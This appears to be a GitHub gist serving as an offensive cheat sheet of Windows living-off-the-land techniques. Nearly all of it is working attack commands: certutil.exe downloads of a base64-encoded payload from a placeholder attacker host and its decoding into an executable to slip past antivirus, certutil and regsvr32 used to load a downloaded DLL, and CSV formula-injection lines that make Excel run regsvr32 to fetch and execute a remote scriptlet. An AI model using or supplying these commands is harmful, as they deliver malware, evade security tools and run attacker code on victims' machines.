-
-
Save HadesNull123/47219a42ce7c15bbdfef56209c76bd8a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# certutil.exe bypass av on download + base64 Decoding | |
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text. | |
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file | |
#into the executable. https://www.browserling.com/tools/file-to-base64 | |
#This is illustrated in Xavier Mertens handler diary. | |
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt | |
C:\Temp>certutil.exe -decode bad.txt bad.exe | |
# certutil.exe bypass av on download - dll injection from regsvr32.exe | |
#https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
certutil -urlcache -split -f [serverURL] file.blah | |
regsvr32.exe /s /u /I:file.blah scrub.dll | |
#csv malware injection | |
#https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/ | |
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!'' | |
=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!'' | |
regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment